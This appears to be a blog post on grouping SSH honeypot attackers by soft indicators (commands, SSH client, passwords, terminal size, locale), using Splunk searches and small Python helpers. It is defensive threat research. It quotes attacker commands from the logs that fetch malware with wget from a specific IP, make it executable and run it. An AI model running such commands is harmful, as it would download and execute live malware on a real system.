One thing I've wanted to do with Tango is find a way to provide some sort of "attribution", or at least identify similarities between attackers as a way to group them together. I'm doing this "attribution" using what I'm calling "Soft TTPs" (Tools, Tactics and Procedures), which can help identify actors based on how they act and what tools they use.

Some TTPs we have access to in our honeypot logs are (in no particular order):

Commands Entered

SSH Client Version

Usernames/Passwords Used

Terminal Window Size

Environment Details

As you can see, none of these things is definitive proof that two sessions belong to the same attacker, which is why they are "soft". Even if all of the above TTPs matched, that's still not a guarantee. I'll give some examples:

There are no commands that are unique to one attacker, but some commands share telling details, such as the same domain being used to host malware. Another scenario is the attacker using the same commands for reconnaissance, such as uname -a, ps -aef, and w. The catch is that most attackers perform the same type of recon. Still, the more commands that match, the more likely it is to be the same attacker. I'm not talking about a 70%-80% match; it would need to be more like 99%-100%, since again, commands aren't unique per attacker. But if 15 commands are entered on a honeypot, and they are all the same, with the same timing and the same arguments (ps -a vs. ps -aux), then it might be the same attacker.
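To make the "same commands, same arguments" idea concrete, here is a minimal Python sketch that scores how much two sessions overlap. The function name and the sample sessions are made up for illustration, and it compares only the command strings; it ignores timing and ordering, which you would want to check separately.

```python
def command_overlap(session_a, session_b):
    """Return the Jaccard similarity (0.0 to 1.0) of two sessions' commands.

    Commands are compared as full strings, so "ps -a" and "ps -aux"
    count as two different commands.
    """
    set_a = {cmd.strip() for cmd in session_a}
    set_b = {cmd.strip() for cmd in session_b}
    if not set_a and not set_b:
        return 0.0  # nothing to compare
    return len(set_a & set_b) / len(set_a | set_b)


# Hypothetical sessions, not taken from real logs.
bot_1 = ["uname -a", "ps -aef", "w"]
bot_2 = ["uname -a", "ps -aef", "w"]
other = ["uname -a", "ps -aux", "w"]

print(command_overlap(bot_1, bot_2))  # identical sessions
print(command_overlap(bot_1, other))  # differs only in the ps arguments
```

A single different argument already drops the score well below the near-perfect match we would want before calling two sessions related.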

Next, SSH Client Version. Again, it's not that valuable by itself, but paired with all the other factors, it's "possible" that it's the same attacker. Here, we would just be looking at whether they are using PuTTY, OpenSSH, or libssh, and what version of the client.

Usernames and passwords can be pretty valuable, especially if really unique passwords are being used. Again, this is pretty pointless on its own, since anyone can grab rockyou.txt and start scanning. However, if there are really unique passwords or a particular username in use, it might be worth looking into.

The Terminal Window Size is another factor to add into your "attribution". We would see something like "Terminal Size: 80x34", which isn't always present, but, sometimes we get it.

Lastly, something we don't normally see in our logs, but have seen, is keyboard/character encoding/language settings or environment variables. Sometimes we'll see UTF-8 or \x00\x00\x00\x04LANG\x00\x00\x00\x0bja_JP.UTF-8 (a Japanese locale), or other language settings. In my opinion, this would probably hold the most weight when used in conjunction with other TTPs, but again, it's no surefire way to identify sessions as the same attacker.
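That raw value looks like two SSH-style strings back to back, each one a 4-byte big-endian length followed by that many bytes (here a name of length 4 and a value of length 0x0b, or 11). Assuming that reading is right, a small Python sketch like the one below can pull the variable name and value apart. The function name is my own and is not part of Kippo.

```python
import struct


def parse_ssh_strings(payload: bytes):
    """Split a payload into length-prefixed strings (uint32 length + bytes)."""
    values = []
    offset = 0
    while offset + 4 <= len(payload):
        (length,) = struct.unpack(">I", payload[offset:offset + 4])
        offset += 4
        if offset + length > len(payload):
            break  # truncated data, stop rather than guess
        chunk = payload[offset:offset + length]
        values.append(chunk.decode("utf-8", errors="replace"))
        offset += length
    return values


raw = b"\x00\x00\x00\x04LANG\x00\x00\x00\x0bja_JP.UTF-8"
name, value = parse_ssh_strings(raw)
print(name, value)  # LANG ja_JP.UTF-8
```

Once the locale is split out like this, it can be treated as just another field to compare across sessions.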

Now that we have identified some of the ways to possibly identify attackers based on their TTPs, let's see how we can do this in Splunk with our honeypot logs.

Grouping Attackers Based on Commands Entered

First up is looking at the commands entered by attackers to spot similarities. Again, we'd need these to be a near-perfect match to have any value for possible attribution. Also note that this would probably only identify bots controlled by the same individual(s), not individual attackers, since it's highly unlikely that an individual would log into several different honeypots and run the exact same commands with no typos. It's possible, but not likely.

sourcetype=kippojson [ search sourcetype=kippojson command=* | stats count by session | fields session ] | transaction session | nomv command | stats values(src_ip) dc(src_ip) as dc by command | sort - dc

The above looks through the honeypot logs and groups the events by their session ID. It then takes all the different commands seen in the grouped event and combines them into one field, resulting in something like ps -ef uname w. We then get the values of the src_ip (attacker) field and the distinct count of attacker IP addresses for each command string.
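If it helps to see that logic outside of Splunk, here is a rough Python equivalent. It is only a sketch: the event dictionaries and IP addresses are invented (documentation ranges), and I'm assuming each session's commands end up as a de-duplicated, alphabetically sorted list, which is what the sample output above looks like.

```python
from collections import defaultdict


def group_by_commands(events):
    """Group sessions by their combined command string and count distinct IPs."""
    commands_by_session = defaultdict(set)
    ips_by_session = defaultdict(set)
    for event in events:
        session = event["session"]
        ips_by_session[session].add(event["src_ip"])
        if event.get("command"):
            commands_by_session[session].add(event["command"])

    # Only sessions that entered at least one command are considered.
    ips_by_command_string = defaultdict(set)
    for session, commands in commands_by_session.items():
        key = " ".join(sorted(commands))  # assumption: unique, sorted values
        ips_by_command_string[key] |= ips_by_session[session]

    rows = [(key, sorted(ips), len(ips))
            for key, ips in ips_by_command_string.items()]
    rows.sort(key=lambda row: row[2], reverse=True)  # like "sort - dc"
    return rows


# Hypothetical events for illustration only.
events = [
    {"session": "s1", "src_ip": "192.0.2.10", "command": "uname"},
    {"session": "s1", "src_ip": "192.0.2.10", "command": "w"},
    {"session": "s1", "src_ip": "192.0.2.10", "command": "ps -ef"},
    {"session": "s2", "src_ip": "198.51.100.7", "command": "ps -ef"},
    {"session": "s2", "src_ip": "198.51.100.7", "command": "uname"},
    {"session": "s2", "src_ip": "198.51.100.7", "command": "w"},
    {"session": "s3", "src_ip": "203.0.113.5", "command": "wget http://example.invalid/x"},
]

rows = group_by_commands(events)
for command_string, ips, distinct_count in rows:
    print(distinct_count, command_string, ips)
```

One side effect of sorting is that the combined string no longer reflects the order the commands were typed in, so it is best read as "which commands", not "in what sequence".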

Looking at the results above, we can see a lot of users running the single command wget http://23.234.60.140/install/8000, which belongs to the SSHPsychos/Group 93/Hee Thai campaign that is pretty big right now. Since only one command is being entered, that's not as useful as the third event down, which is:

./8003 chmod +x 8003 ls -la /var/run/sftp.pid wget http://23.234.60.140/install/8003

While the above doesn't have a ton of commands being entered, it's a better example of what could be considered a "soft" TTP, since it shows them downloading the malware, making it executable and then running it. Again, it's not great, but, it's a start.

SSH Clients

Adding on to the previous search, we can further see if these are all the same attackers, by looking at what SSH client they used to connect to our honeypots:

sourcetype=kippojson [ search sourcetype=kippojson command=* | stats count by session | fields session ] | transaction session | nomv command | stats values(src_ip) dc(src_ip) as dc values(client) by command | sort - dc

We added in the values(client) to the original search, which will give us all the different SSH clients seen:

Looking at the screenshot, the commands of interest were seen with only one SSH client, SSH-2.0-PUTTY. Again, this doesn't prove they are definitely the same attacker. However, it helps that there is only one client version, unlike the top event in the screenshot, which shows multiple clients.
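The client field is the SSH identification string, which has the general shape SSH-protoversion-softwareversion, optionally followed by a space and comments. If you want to compare the software part separately from the protocol version, a small Python sketch like this can split it. The function name is my own, and apart from SSH-2.0-PUTTY the sample strings are only illustrative.

```python
def parse_client_version(banner: str):
    """Split an SSH identification string into protocol and software parts."""
    banner = banner.strip()
    if not banner.startswith("SSH-"):
        return None
    ident = banner.split(" ", 1)[0]   # drop optional trailing comments
    parts = ident.split("-", 2)       # software part may contain "-" itself
    if len(parts) != 3:
        return None
    _, protocol, software = parts
    return {"protocol": protocol, "software": software}


print(parse_client_version("SSH-2.0-PUTTY"))
print(parse_client_version("SSH-2.0-libssh-0.6.3"))          # illustrative
print(parse_client_version("SSH-2.0-OpenSSH_6.6.1p1 extra"))  # illustrative
```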

Username/Password Analysis

I don't have a great example of this, since most of the honeypots I have access to accept any password, which doesn't provide us with good data for analysis. The honeypots I personally manage, however, accept only one password, which is the data I will be using for this example:

sourcetype=kippojson [ search sourcetype=kippojson src_ip=104.167.16.5 OR src_ip=175.126.82.235 host=hp-belair-md-01 | stats count by session | fields session ] | transaction session | stats values(password) by src_ip

In the search above, I'm limiting the attacker IPs to the two that ran the same commands, and I'm also limiting it to just my honeypot. At the end of the search, I ask Splunk to return the values of password for each attacker IP. Unfortunately and fortunately for me, I'm using the weakest password known to man, 123456, which gets me a lot of attackers logging in, but doesn't let everyone in all the time. Because it's so weak, it was probably one of the top passwords the attackers tried, which is evidenced by this screenshot:

What we don't see, though, is that the other password was empty. So the attackers tried an empty password, then 123456, and got in. This isn't proof that these are the same attackers; it just shows they are possibly using the same list. But if we pair this with the attackers using the same commands and the same SSH client, we're closer to identifying them as the same user.
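Since an empty password is easy to miss in a list of values, here is a small Python sketch that keeps every attempt, in order, per attacker IP and then checks whether two IPs tried the same sequence. The events are hand-written to mirror what I described (empty password, then 123456) and use placeholder IPs, not the real ones.

```python
from collections import defaultdict


def password_attempts_by_ip(events):
    """Collect password attempts per source IP, in the order they were seen."""
    attempts = defaultdict(list)
    for event in events:
        if "password" in event:  # keep empty strings, skip non-login events
            attempts[event["src_ip"]].append(event["password"])
    return dict(attempts)


def same_attempt_sequence(attempts, ip_a, ip_b):
    """True if both IPs are present and tried the same passwords in order."""
    seq_a = attempts.get(ip_a)
    return seq_a is not None and seq_a == attempts.get(ip_b)


# Hypothetical login events for illustration only.
events = [
    {"src_ip": "192.0.2.10", "password": ""},
    {"src_ip": "192.0.2.10", "password": "123456"},
    {"src_ip": "198.51.100.7", "password": ""},
    {"src_ip": "198.51.100.7", "password": "123456"},
]

attempts = password_attempts_by_ip(events)
print(attempts)
print(same_attempt_sequence(attempts, "192.0.2.10", "198.51.100.7"))
```

Matching sequences only suggest a shared password list, so this is one more soft indicator rather than a verdict.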

Terminal Window Size

This is just another source of data that could add a little more probability that it's the same attacker. We don't see this data often, however, which limits how much it helps. Below is an example of when we do:

The above screenshot shows the values of the terminal_size field by attacker IP. I'm not sure of the significance of the switch from 24x80 to 80x24; that's something I'll look into more. Still, having access to this could help us out a little, since if the attackers are using the same window size, along with the same SSH client version, the same commands, and the same passwords, then it's possible it's the same attacker.
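Putting the indicators together, a simple way to think about it is to count how many of them line up between two attackers. The Python sketch below does just that. The profile layout, field names, and sample values are my own invention for illustration, and a missing value (terminal size is often absent) counts as "unknown", not as a match.

```python
FIELDS = ("commands", "client", "passwords", "terminal_size")


def matching_indicators(profile_a, profile_b):
    """Return the soft-TTP fields that are present and equal in both profiles."""
    matches = []
    for field in FIELDS:
        value_a = profile_a.get(field)
        value_b = profile_b.get(field)
        if value_a is not None and value_a == value_b:
            matches.append(field)
    return matches


# Hypothetical profiles for illustration only.
attacker_a = {
    "commands": ("uname -a", "w"),
    "client": "SSH-2.0-PUTTY",
    "passwords": ("", "123456"),
    "terminal_size": "80x24",
}
attacker_b = {
    "commands": ("uname -a", "w"),
    "client": "SSH-2.0-PUTTY",
    "passwords": ("", "123456"),
    "terminal_size": None,  # not logged for this session
}

print(matching_indicators(attacker_a, attacker_b))
```

The more fields that come back, the stronger the hint, but it stays a hint.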

Environment Details

The last section I'll touch on is the environment details, such as language encoding. This hasn't been implemented in the fork of Kippo I'm using, but in the original Kippo, we saw this quite a bit:

In the screenshot we can see a few different language encodings, such as English, German, and Chinese. Like I said, we don't have access to this in the new fork of Kippo, so it's not of much use to us right now. However, I will submit an issue on the GitHub page and see if we can get this added, since I feel it can provide that extra probability for grouping attackers together.

Closing

So, what does all this tell us? Well, if you're into attribution or doing threat research, it can help you identify a particular attacker's infrastructure. By being able to identify a group's TTPs, you can look for these patterns and trends in your logs and, with some certainty, attribute certain attacks to the same attacker. This will allow you to prioritize attacks from these actors, depending on how "bad" these guys are.

Again, I'm not claiming that this is a foolproof way to do attribution, nor am I saying that these attackers are the same. I'm just providing some insight and a few ways to possibly identify the same attackers.

One last thing: I started using a new visualization in Splunk, the dendrogram. It's useful for producing visual diagrams that can highlight items of interest. For example, I did a search for SSH clients and IPs that run the same group of commands, which looks like this...

Looking at the screenshot, we can see a few commands being entered, which all use the same SSH client, and then the multiple IPs that are running those commands. Here's the applicable code that produced the above, assuming you have the app installed.